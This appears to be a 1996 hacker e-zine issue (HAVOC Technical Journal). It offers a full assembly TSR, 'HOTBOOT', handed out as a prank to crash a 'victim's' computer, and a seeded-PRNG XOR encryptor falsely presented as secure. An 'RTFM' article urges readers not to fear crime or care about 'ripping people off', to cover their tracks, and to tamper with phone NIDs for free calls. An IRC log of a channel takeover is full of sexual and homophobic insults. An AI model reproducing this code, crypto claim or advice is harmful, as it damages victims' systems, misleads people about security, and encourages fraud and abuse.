The following Turbo Pascal listing gives you a working example of the infinite length key XOR system. Note that random number generators will most likely be platform and language specific, so that a Turbo Pascal compiled system probably won't work with a Visual Basic system, and vice versa. This brings an added benefit, for to break the code, you would not only have to cycle through every single possible seed value, you would also need to know the specific language and version to even attempt to crack the code.


Listing one - infinite length XOR encryption example

 
Program InfiniteXORKey; 
 
{ An example encryption system that selectively seeds a random number 
  generator to choose a particular sequence of random numbers, which 
  are then used to encrypt or decrypt a file. 
 
  Syntax 
 
  Infinkey INPUTFILE OUTPUTFILE RANDOMSEED 
 
  where randomseed is any long integer 
 
} 
 
 
uses crt, dos; 
 
var Input, Output : file; 
    Numread, NumWritten : word; 
    Buffer : array[1..4096] of char; 
    seed : longint; 
    i : integer; 
    VerifyFile : SearchRec; 
    InputFile, FileName : string; 
 
begin 
     { Verify paramaters } 
     if ParamCount <> 3 then begin 
                                  Writeln ('Invalid number of paramaters'); 
                                  Halt(1); 
                             end; 
     { Verify original file's existance } 
     FindFirst (Paramstr(1), AnyFile, VerifyFile); 
     InputFile := paramstr(1); 
     { Convert file name to uppercase } 
     For i := 1 to length(ParamStr(1)) do 
       FileName := Filename + UpCase(InputFile[i]); 
     If VerifyFile.Name <> FileName then begin 
                                            Writeln ('Input file not found'); 
                                            Halt(2); 
                                          end; 
 
     Assign (Input, Paramstr(1)); { Open file for input } 
     Reset  (Input , 1 ) ;        { Record size = 1     } 
     Assign (Output, ParamStr(2)); { Open file for output } 
     Rewrite (Output, 1 ) ;        { Record size = 1      } 
 
     Writeln ('Encrypting ', FileSize(Input), ' bytes....'); 
     { Get information, then encrypt } 
 
     { Seed our generator to give an infininte key } 
       Val ( Paramstr(3), seed, i); 
       RandSeed := ( seed ); 
     repeat 
           BlockRead (Input, Buffer, SizeOf(Buffer), NumRead); 
 
           for i :=1 to numread 
           do begin 
                   Buffer[i] := chr(ord(buffer[i]) XOR Random(256)); 
              end; 
 
           BlockWrite ( Output, Buffer, NumRead, NumWritten); 
 
     until (numread = 0 ) or (numwritten <> numread); 
 
     Close( Input ); 
     Close( Output ); 
end. 

 
 

Conclusion

While XOR encryption may have been, in the past, viewed as easily crackable, with the principle of seeding a key of the length of the original data, you can incorporate easy encryption into your own software. While it still has its limitations, in that the random number generator used in one language will not give you the same set of values in another language, if you did need to make code that was easily portable to other platforms, you could design your very own random number generator. This would eliminate any of the above mentioned limitations.


Back to the TOP

Hot Boot Crash by |\|\cFill



|\|\cFill e-mailed this to me, and basically what it does is when the user (err, victim) Reboots, well their computer will crash.. have fun!

hmm... aparrently South American keyboards beboot on ALT+CTRL+BACKSPACE ...

;
;       NAME......:     HOTBOOT.ASM
;       FUNCTION..:      Reboot when ALT+CTRL+BACKSPACE
;       COMPILER..:     Turbo Assembler 2.0 or sup.
;       DATE......:     10/12/1996
;       AUTHOR....:     |\|\cFiLL  -  TeEnAgErS AsSoCiAtEs
;
; TnG Staff:
;         - LuCiFeR
;         - SoNiC
;         - FlaGG 
;         - |\|\cFiLL
;         - AmAzInG


BEL             EQU     7
CR              EQU     13
LF              EQU     10
LAST_VECT       EQU     80h
JMP_FAR         EQU     0EAh
SHIFT_STATUS    EQU     17h
CRT_ADDR        EQU     63h
ALT_CTRL_MASK   EQU     0Ch             ; MASK FOR ALT+CTRL
BKS_SCAN_CODE   EQU     0Eh             ; BACKSPACE


CSEG            SEGMENT PARA    PUBLIC  'CODE'
        ASSUME  CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG

                ORG     100h
START:          JMP     MAIN            ; EXECUTE THE SOFT


                ORG     100h

;*******************************************************************************
; RESIDENT VARIABLES OF SOFT
;*******************************************************************************

VEC_TAB         DD      LAST_VECT       DUP(?) ; PICK UP INT VECTS
BLOCK_ADDR      DW      ?                      ; NEXT SEGMENT
BLOCK_SIZE      DW      ?                      ; SEGMENT SIZE
OK$             DB      BEL, 'TnG Corp: '
                DB      'memmory state restored (if possible).$'


;*******************************************************************************
; KBD_INT - NEW KEYBOARD INTERRUPT
;*******************************************************************************

KBD_INT         PROC    FAR

                PUSH    AX DS           ; PICK UP ALT. REGISTERS

                MOV     AX, 40h         ; PREPARE TO BIOS DATA AREA
                MOV     DS, AX
                MOV     AL, BYTE PTR DS:[SHIFT_STATUS]
                AND     AL, 0Fh
                CMP     AL, ALT_CTRL_MASK
                JNE     BAD_KEY

                IN      AL, 60h         ; SCAN CODE KEY CHECK
                CMP     AL, BKS_SCAN_CODE
                JNE     BAD_KEY

                IN      AL, 61h         ; KEYBOARD READ SIGNAL
                MOV     AH, AL
                OR      AL, 80h
                OUT     61h, AL
                XCHG    AH, AL
                OUT     61h, AL
                MOV     AL, 20h         ; END OF INTERRUPT SIGNAL
                OUT     20h, AL

                PUSH    CS
                POP     DS

                MOV     ES, BLOCK_ADDR  ; CREATE LAST MCB
                CLD
                XOR     DI, DI
                MOV     AL, 'Z'
                STOSB
                XOR     AX, AX
                STOSW
                MOV     AX, BLOCK_SIZE
                STOSW

                XOR     AX, AX          ; RESTORE INTERRUPT VECTORS
                MOV     ES, AX
                MOV     SI, OFFSET VEC_TAB
                XOR     DI, DI
                MOV     CX, LAST_VECT * 2
                CLI
                REP     MOVSW
                STI

                MOV     BX, CS          ; ACTIVATE PSP
                MOV     AH, 50h
                INT     21h

                MOV     AX, 40h         ; CHANGE VIDEO MODE TO 80x25 TEXT
                MOV     ES, AX
                MOV     AL, 7                   ; VIDEO MODE 7 - HGC, MDA
                CMP     ES:[CRT_ADDR], 3B4h
                JE      SET_MODE
                MOV     AL, 3                   ; VIDEO MODE 3 - CGA, EGA, VGA
SET_MODE:       XOR     AH, AH
                INT     10h

                MOV     DX, OFFSET OK$          ; DESINSTALATION
                MOV     AH, 9
                INT     21h

                MOV     AX, 4C00h               ; ABORT TO OPERATIVE SYSTEM
                INT     21h

BAD_KEY:        POP     DS AX                   ; JUMP TO OLD INT 9
                DB      JMP_FAR
OLD_KBD         DD      0
        
KBD_INT         ENDP

END_TSR         EQU     $


;*******************************************************************************
; NON RESIDENT VARIABLES
;*******************************************************************************

COPYRIGHT$      DB      ' Boot 1.0 - by: |\|\cFiLL @ TnG Corp. 1996.$'

INSTALL_OK$     DB      CR, LF, 'ALT+CTRL+BACKSPACE, to make a  boot.'
                DB      CR, LF, 'NOTE: '
                DB      'just use on system CRASH state.$'

LH_ERR$         DB      BEL, CR, LF, 'ERROR: '
                DB      'do not load on high memmory.$'


;*******************************************************************************
; MAIN  -  PRINCIPAL SOFT
;*******************************************************************************
MAIN:
                MOV     DX, OFFSET COPYRIGHT$   ; WHO AM I
                MOV     AH, 9
                INT     21h

                MOV     AX, CS                  ; CHECK HIGH MEMMORY
                CMP     AX, 0A000h              ; LOAD
                JB      LOW_MEM

                MOV     DX, OFFSET LH_ERR$      ; ERROR
                MOV     AH, 9
                INT     21h

                MOV     AX, 4CFFh               ; END OF SOFT
                INT     21h

LOW_MEM:        MOV     DX, OFFSET INSTALL_OK$  ; INSTALATION
                MOV     AH, 9
                INT     21h

                XOR     AX, AX                  ; INTERRUPTS TABLE COPY
                MOV     DS, AX
                MOV     CX, LAST_VECT * 2
                MOV     SI, AX
                MOV     DI, OFFSET VEC_TAB
                CLD
                REP     MOVSW

                PUSH    CS                      ; RESTORE DS
                POP     DS

                MOV     ES, DS:[2Ch]            ; LEAVE ENVIRONMENT BLOCK
                MOV     AH, 49h
                INT     21h

                MOV     AX, 3509h               ; REDICIONATE INT 9
                INT     21h
                MOV     WORD PTR OLD_KBD, BX
                MOV     WORD PTR OLD_KBD+2, ES
                MOV     AX, 2509h
                MOV     DX, OFFSET KBD_INT
                INT     21h

                PUSH    CS                      ; CALCULATE SOFT SIZE
                POP     ES
                MOV     BX, (OFFSET END_TSR - CSEG + 15) SHR 4
                MOV     DX, BX
                MOV     AX, CS
                ADD     AX, BX
                MOV     BLOCK_ADDR, AX

                MOV     AH, 4Ah                 ; CHANGE MCB SIZE
                INT     21h

                MOV     BX, -1                  ; DISP. MEMMORY
                MOV     AH, 48h
                INT     21h
                MOV     BLOCK_SIZE, BX

                MOV     AX, 3100h               ; GET OUT TO S.O. AND STAY RESIDENT
                INT     21h

CSEG            ENDS
                END     START
Back to the TOP

the Transatlantic Telephone Cable #8 (TAT-8) info by Keystroke




One night while I was out doing stuff (heh) and I found these BellCore document just lying around! It turns out they were on the Transatlantic Telephone Cable #8. aka TAT-8. Here's what they said:
IN SERVICE: SINCE 1988
LOCATION: TUCKERTON, NJ TO WIDEMOUTH, ENGLAND
                                TO PENMARCH, FRANCE
UNDERSEA PATH LENGTH: 5600km +500km ENGLAND }\ [It branches off in two
                        directions, as you can see in int picture]
                                    +300km FRANCE    }/
WAVELENGTH: 1.3um
FIBER: MONOMODE DEPRESSED CLADDING FIBERS IN A CABLE
             1.6 AMPERE CONDUCTOR FOR REPEATER POWER
LIGHT SOURCE: DOUBLE HETEROSTRUCTURE LASER DIODES
        MEDIAN LIFETIME = 10^6 HOURS

CAPACITY: 557 Mbps
        +  2 FIBER PAIRS OPERATING AT 295.6 Mbps
        +  2 STANDBY FIBERS
        +  40,000 VOICE CHANNELS (USING ADAPTIVE DELTA PULSE CODED MODULATION)
        +  ELECTRONIC MULTIPLEXERS AND DEMULTIPLEXERS CONVERT BETWEEN THE
              295.6 Mbps LINES AND THE EUROPEAN 139.264 Mps LINES

TRANSMITTER: LASER DIODE InGaAsP (1290-1330nm)
                OUTPUT POWER > 5mW AT 30mA
RECEIVER: InGaAs PIN DIODE

REPEATERS: INTER-REPEATER DISTANCE =[about] 35km-50km, 103 REPEATERS
                 6 REGENERATORS IN EACH REPEATER, (2 IN ONE DIRECTION,
                         2 IN THE OTHER DIRECTION, 2 STANDBY)

PARTNERS IN THE TAT-8 PROJECT

34.10% AT&T
27.00% FOREIGN INVESTORS
15.50% BRITISH TELECOM
13.60% MISCELANEOUS INVESTORS
  9.80% FRANCE
100.00% HAVOC (:
Back to the TOP

For your reading pleasure... the take over of #e.p.a.!


E.P.A. (Elite Phreakers Alliance) were a group of lamers that invited is to their channel, and as you can see the boys of #phreak made them regret they ever invited us.. enjoy!

NOTE: this is also online:

http://www.geocities.com/SiliconValley/8805/e_p_a.log

Session Start: Wed Dec 04 01:17:09 1996 *** Now talking in #e.p.a. <Scud-O> whats up <Scud-O> heheh hey el4n <Sanctity> not much <Sanctity> hi Scud-O <Scud-O> hey <Sanctity> welcome <el4n> hi scud *** memor (~derzeter@194.206.81.193) has joined #e.p.a. <Scud-O> so tell us about epa <Sanctity> hey memor *** ec|ipse (eclypse@kam-as-01b06.direct.ca) has joined #e.p.a. <ec|ipse> w3rd <ec|ipse> i did it <el4n> what if somone.. how should i say.. was not "eleet" wanted to join up.. could they still do this? <Scud-O> tell us bout epa <el4n> i mean get in epa an all? <ec|ipse> do you guys get lots of chicks? <memor> i thank elite was on bbs only.. <Sanctity> EPA is just basically a bunch of guys from canada <Scud-O> k <Scud-O> hehe chicks *** YourMom (jlmason@pm028-06.dialip.mich.net) invites you to join #teenhackers <Sanctity> lots o chicks <el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers <el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers <el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers <el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers <el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers <el4n> *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers <el4n> yes <ec|ipse> i will join epa if you gets lots of chicks <el4n> YES YES YES <ec|ipse> i am from canada <Sanctity> let's get some chicks! <Scud-O> i am a canuck... moved to us.. but moving back <el4n> HOLY SHIT <el4n> THERES MORE PEOPLE THEN THEN LIKE ANYWERHE!@$ <el4n> #TEENHACKERS <Scud-O> hey baby.. im in epa... want to go fuck? <el4n> IS THE PLACE <Draim_K> me from canada <memor> well if ^cna^ is from epa, i'll join heh <el4n> HEHE <Scud-O> teen hacers <Sanctity> chicks!! <ec|ipse> what about teen hacker chicks? <Draim_K> * (__) <Draim_K> * /oo\\________ <Draim_K> * \\ / \\ <Draim_K> * \\/ / \\ <Draim_K> * \\_|___\\_|/.\\ <Draim_K> * || YY| o ' <Draim_K> * || || O <Draim_K> * ^^ ^^ <ec|ipse> type ~beast el4n *** Drooke (wassupfoo@stjhts15c43.nbnet.nb.ca) has joined #E.P.A. *** Drooke changes topic to "Elite Phreakers Assotiation" *** Draim_K has quit IRC (Read error to Draim_K[stjhts15c43.nbnet.nb.ca]: Connection reset by peer) <el4n> ~BEAST <ec|ipse> el4n has been feeling desperate lately... el4n notices a lovely cow grazing out in a field... el4n can't hold it any longer and runs out into the field and fucks the cow. <ec|ipse> §öMêöñê T¥þê ~ßå® *** Drooke is now known as Draim_K <ec|ipse> if u want me eleet ass in epa, i better be getting awps <Scud-O> let me in to epa!!!!!!!!!!!!! <el4n> i know redbox teknique *** DrubleR (~Hey.who.n@btstts01c12.nbnet.nb.ca) has joined #E.P.A. <ec|ipse> ok *** Sanctity sets mode: +o DrubleR * Sanctity hands DrubleR some of dat stuff!!! <ec|ipse> well, awp me <DrubleR> heh heh <Draim_K> hey sanc <Draim_K> op *** Keystroke (ßøZø) (~y@ppp-21.ts-1.mvl.idt.net) has joined #e.p.a. <el4n> anybody know why my redbox dosent work? *** Sanctity sets mode: +o ec|ipse * Sanctity hands ec|ipse some of dat stuff!!! <memor> KEYz <Draim_K> op <el4n> i need to be oped also <DrubleR> brb *** Sanctity sets mode: +o el4n * Sanctity hands el4n some of dat stuff!!! <Scud-O> op me *** el4n sets mode: -o DrubleR *** el4n sets mode: -o Sanctity <el4n> oooooops <memor> db.. :) * Sanctity takes out his Shotgun and tells Draim_K you got 10 seconds to run * Sanctity Draim_K 10 * Sanctity Draim_K 1 * Sanctity pulls out the shotgun and blows Draim_K 's head off.. *** el4n sets mode: +o Scud-O <Scud-O> hehe thbjma sel * Sanctity shows Draim_K a broomstick and some KY........ <Sanctity> Suddenly some cheap 70's porno film music comes on [BOOMP-CHICKA-BOOMP-BOWWWWW!] <Sanctity> Draim_K decides he'd prefer not to take chances and runs like fuck...... *** ec|ipse sets mode: +m *** el4n sets mode: +o memor <memor> heh.. *** el4n sets mode: +o Keystroke <Scud-O> than you el <Scud-O> hehehehehehehe <memor> ah.. db wont change hehe <el4n> hey <Scud-O> KEY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! <ec|ipse> w3rd el4n! *** Keystroke changes topic to "The so called e.p.a. should be the g.f.a. for gay fags accociation. You (the one op) sucks a nut! I own your lame asses" <Keystroke> hehe <el4n> im not the president of EPA <Keystroke> Yea <Scud-O> you the man! <Scud-O> heheheh <el4n> EPA was bought out <Keystroke> oops <el4n> terrable takeoveer * Keystroke didnt know he had ops <Scud-O> damn <Scud-O> key rules.. he always has ops *** Draim_K (wassupfoo@stjhts15c43.nbnet.nb.ca) has left #E.P.A. *** Keystroke changes topic to "#phreak owns ewe" <Scud-O> takeovers rule... *** Keystroke sets mode: +nt -memor:#e.p.a.- Scud-O takes rule... And Eats His Brain. <Keystroke> hehe <Scud-O> so now we are in epa right? <Keystroke> #2600 and #hackers and #phreak and #hackerz were all mine one night :) <Scud-O> memor: ? *** el4n changes topic to "EPA = Educated Pastrey Associates" <memor> yea? *** el4n changes topic to "EPA = Educated Provalactic Associates" <Scud-O> what do you mean and eats his brian? <memor> ha heh my events *** el4n changes topic to "EPA = Endured Provalactic Associates" <Scud-O> heheh im in epa!!! *** el4n changes topic to "EPA = Endured Provalactic Association" *** Keystroke changes topic to "EPA = Eat Penis and Ass" <Scud-O> Enviroenmental PRotction agency <memor> well => take*:#: $nick takes $1 $+ $2 $+ $3 and hits his brain <Scud-O> Evironmental Protection Agency <el4n> yes <el4n> we needed a name change <el4n> the old one was just to flamboyend *** arg (~sergio@ppp-24.ibw.com.ni) has joined #E.P.A. <Scud-O> hehehe okay <el4n> flamboyent <Scud-O> your weird memor <el4n> fuck i gotta learn to type <Scud-O> I like that in a phreaker *** arg (~sergio@ppp-24.ibw.com.ni) has left #E.P.A. <memor> iam yea heh.. <el4n> Scud - have you just been having alot of sex or what?? i havent seen you in ages <Keystroke> hehe *** el4n sets mode: -m <el4n> ok <el4n> now what do youall have to say for yerselfs? <Scud-O> el: yes.. 34-54 times a day! <el4n> holy gawd <el4n> no wonder you have no time for fcompouter <el4n> FUCK <el4n> LEARN TO TYPE *** Keystroke has quit IRC (Excess Flood) <el4n> me that is. <Scud-O> el: sorry... I dont fuckinh want to type... I speach itialian damn it <Scud-O> I cant spell either.. <ec|ipse> heheheh <ec|ipse> type ~beast <ec|ipse> my friend hasn't seen them <Scud-O> actually im getting a bj right now.. so its hard to type! <el4n> ~beast <ec|ipse> el4n has been feeling desperate lately... el4n notices a lovely cow grazing out in a field... el4n can't hold it any longer and runs out into the field and fucks the cow. <el4n> ~breast <el4n> ~kittylitter <el4n> i see.. <ec|ipse> type ~rlu *** Keystok (bozo@ppp-21.ts-1.mvl.idt.net) has joined #e.p.a. *** ec|ipse sets mode: +o Keystok <el4n> ~rlu <ec|ipse> el4n takes a crowbar and breaks into an RLU and starts ripping it apart... way ta go, el4n ! <Keystok> I scroolled it 10000000000 times <Keystok> #gaysex <Keystok> hehe <Keystok> Thanks <el4n> what did you skrewl? <el4n> skkroll <ec|ipse> *** Now talking in #gaysex <ec|ipse> <ec|ipse> i want it up the ass <Scud-O> do you screw off? <Keystok> #EPA <Keystok> not e.p.a. <Keystok> hehe <Keystok> Ask what keystroke did <Keystok> They will cry *** Digital_X (user@raptor.top.monad.net) has joined #e.p.a. <Digital_X> :) *** Digital_X (user@raptor.top.monad.net) has left #e.p.a. <Scud-O> heleo <Keystok> X! <ec|ipse> this channel is gross <Scud-O> yea.. it sucks <Scud-O> die die die die *** memor has quit IRC (Read error to memor[194.20 6.81.193]: Connection reset by peer) <ec|ipse> <ec|ipse> /msg el4n ok, i'll have gay sex with you :) <ec|ipse> <ec|ipse> ooops <el4n> haha <el4n> scud- o : anyone msg ya? <Scud-O> i want it now... *** ec|ipse has quit IRC (Excess Flood) <Scud-O> msg me.. nope.. dontta thinka so *** ec|ipse (~eclypse@kam-as-01b06.direct.ca) has joined #e.p.a. <el4n> right now?? *** el4n sets mode: +o ec|ipse *** memor (~derzeter@ppp1.planetb.fr) has joined #e.p.a. *** Scud-O sets mode: +o memor <memor> Error: WSAENOTSOCK (4) by TCPMAN <ec|ipse> conf info <Keystok> CYA <Keystok> CYA <Keystok> CYA <Scud-O> no dpont go <Keystok> CYA <Scud-O> no *** Keystok (bozo@ppp-21.ts-1.mvl.idt.net) has left #e.p.a. *** Defraz (~just@208.129.36.31) has joined #E.P.A. * Sanctity shows el4n a broomstick and some KY........ <Sanctity> Suddenly some cheap 70's porno film music comes on [BOOMP-CHICKA-BOOMP-BOWWWWW!] <Sanctity> el4n decides he'd prefer not to take chances and runs like fuck...... <el4n> h3h3h3 <el4n> funny stuff san <Scud-O> hehe <Sanctity> yeah, my friend wrote this prog <Sanctity> it rocks *** Vakant (Drub@btstts01c12.nbnet.nb.ca) has joined #e.p.a. <Scud-O> ello <Scud-O> we own this channel.. you must hail us all! <el4n> prog? <Scud-O> hehehehehehehehehehe <el4n> you call that a prog? *** had (~jjh@pm8-13.enter.net) has joined #E.P.A. <el4n> i think i m going to add some shit to my popups.ini <el4n> n call it a program <el4n> yeh.. were the EPA <el4n> BOW DOWN *** had (~jjh@pm8-13.enter.net) has left #E.P.A. <Scud-O> yea bow now damn it.. or be killed!!!!!!! !!!!! <Scud-O> ehehehehehehehehehheheheheheheheheheheheh ehehe * Sanctity grabs Scud-O by the neck and hooks Scud-O's upper jaw over his thumb.. * Sanctity takes careful aim while stretching Scud-O wayyy out..... * Sanctity releases Scud-O..... *twang* <el4n> i think that i will have to take off the pants and belt in a second <el4n> dont piss me off *** Draim_K (wassupfoo@stjhts15c43.nbnet.nb.ca) has joined #e.p.a. <el4n> sanctuty - tell your friends that hes a homo will ya :) *** Podunk (zero@ppp39.respool1.medina.ohio.net) has joined #E.P.A. *** MuD-SeRV (wassupfoo@stjhts15c43.nbnet.nb.ca) has joined #e.p.a. <Scud-O> ewww... that would hurt *** MuD-SeRV is now known as Ere <Scud-O> heheh im gunna piss all over you <Scud-O> ahahahahahahahha <Scud-O> Im mad.. mda is say! <Scud-O> get your spite in a bag <Scud-O> get your bile pilled up... <Scud-O> its thje best damn vengance youve ever had! -Scud The Dispossible Assassin! <Scud-O> i cant type for shit can it folks? Session Close: Wed Dec 04 01:45:10 1996
Back to the TOP

RTFM: The Lamer Journal


Street Smarts


I found this in the Empire Times and well.. I want you to read it. Armitage says some very true things...

From the Empire Times issue 7




I've read alot in recent magazines and have seen alot on tv recently about hackers, and it makes me sick. I don't think the perceptions are accurate. Even though it bothers me, being the laid back individual I am I don't let it get to me. Maybe that is my fault, maybe it is good though.


I want to send out a message to all the covert hackers and phreakers. Not many people have such talents that some of us have. Use them wisely, and think about what you are doing before you do it. I am not saying hacking is bad (no no, why would anyone think that?). I am just saying that think about what you are doing and how you can get caught. I don't want people to get locked up like Mitnick and others. Watch yourselves.


I'm going to keep it short and sweet. This is definatly a period of busts. Many many fellow hackers have gone 'down'. That is something that most people consider the worst thing that could ever happen to a member of the computer underground.


Till the next Empire Times,

armitage@dhp.com




Armitage speaks the truth. We are in a period of heavy busts. You probably will not have all the time you need to learn before you get busted. If you cant handle this then stop reading this file and destroy all of the hacking/phreaking files you may have found. If you are worried of being busted, you have failed. If you worry about being busted, you are not a hacker or phreaker. If you worry about being busted, you will be busted.


Still here? Good. Congradulations! You have taken the first step towards becoming a h/p person. You mut not fear or care! You must not fear doing illegal things, and you must not care about ripping people or companies off. If you do, you will get busted my friend.


Second, don't ask for help with EVERY little detail. Most people with some practice in H/P will not help you. They may help out a little, but the rest you must find out for yourself. That is what hacking and phreaking is. It is Exploring. Not ripping people off or doing illegal things, it is the exploring of systems for KNOWLEDGE! You MUST know this. If you think Hacking or phreaking is just about having fun, i'm calling the cops right now. Sure it is fun, but it takes alot of work. Don't expect to be spoon fed everything. Sure the first stuff is pre-canned for you, but the further you go into things the more you will have to learn by your own mistakes.


Third, Be VERY (emphasis on VERY) careful with who you share info with most people on IRC do NOT know what they are talking about and so, they will only mess things up for you. You must be VERY careful with what you say to people. I am a very open person online, and one day this will hurt me. I will get busted probably for trusting the wrong person. Don't make that mistake.


Fourth, COVER YOUR TRACKS!! This is VERY imortante! when you are messing around with a shell script or program, telnet thru several different accounts first. In
issue 4 at the end I published a list of freenets to use. So get issue 4 and use those accounts. Also, NEVER call numbers from your house unless you want to be busted! Use a pay phone or someone elses phone. I published an article in issue 4 which clearly tells you how to mess with NIDs to make free phone calls. Just going around your neighborhood should turn up a few NIDs to play with.


I dont want to sound like i'm condemning you to death or anything, it is just that it is much harder to stay around in the "underground" these days.


Safe Hacking & Phreaking-

Scud-O : FoxMulder@worldnet.att.net

NOTE: if you use a lame nationwide ISP like AOL, P*, Netcom or MSN. Go and cancel your account NOW! Get a local ISP or use AT&T or earthlink. They need the money and almost all local ISPs have shell accounts so you can use scripts!


Or if you only get a SLIP/PPP acount, l0pht and many other places have shell accounts at low prices you can telnet in to!


Next Month on RTFM:
Basics on hacking

2 Month From Now:
Basics on phreaking

Back to the TOP

ROLL CALL & More!



Who is HAVOC Bell Systems?
Scud-OLinux Lammah
PsychoAll Around Lammah
|\|\cFillMad Genius (doing wonders for tNg mIRC v.2.0!)
KeystrokeMad PLA Insider
Sancho PanzaThis boy is so lame he couldn't hack is way out of a bag! hehehehehe (no wonder he's not in HBS)
The MIA people have been taken off the list!


Cool Undernet Channels:

#phreak
#rewt

Cool People:


UnaBomber (if he's ever on anymore!)
theLURK3R (aka `X`)
demonweed
darkcyde (if he's ever on anymore!)
Rap3d_C0w
luthor
CiND3R
RedTyde (aka ^ReDMaN^)
RedDeath
el4n
memor
LuCiFeR_
X-SeRiAl
yesimlame
fusi0n
KungFuFox
ArcAngel
darcangel
BC219
XiN0 (hehehehehehe.. bwahahahahahahahahahahaha)

all of these fine gents can be found on #phreak

(Who will i add to HBS? find out next month!)

Lamah of the Month:


kradd00d - kradd00d@juno.com (Do I REALLY need to explain this one?)


This Month Question(s): Why did it take you SO long to put out the issue?


Well first NO ONE turned in thier articles! (the little punks) Anyway, I had all my stuff done and on the 15th when this issue was first going to come out, |\|\cFill send me his article. Psycho is such a lamer that i had to write his article for him the lame @$$ bitch! And well Keystroked HD exploded after installing linux (which im going to be doing soon) and so it took him until today (12/26/96) to send it out to me.
-Oh Well-
(sign)

Next Month's Question: Who are |\|\cFill and Keystroke and Psycho?



Back to the TOP

Next Month:


This MAY be what we will have in issue 7
- Pagers
- Cell Phones
- A shit load of good UNIX C code stolen from theLURK3R!
- The Practical Mailbomber for every day use
- More from the RTFM: The Lamer Journal
- Much, Much more TBA!
Issue 7 is out Jan. 31st!


cya ya next issue! - The HAVOC Technical Journal Crew


Back to the TOP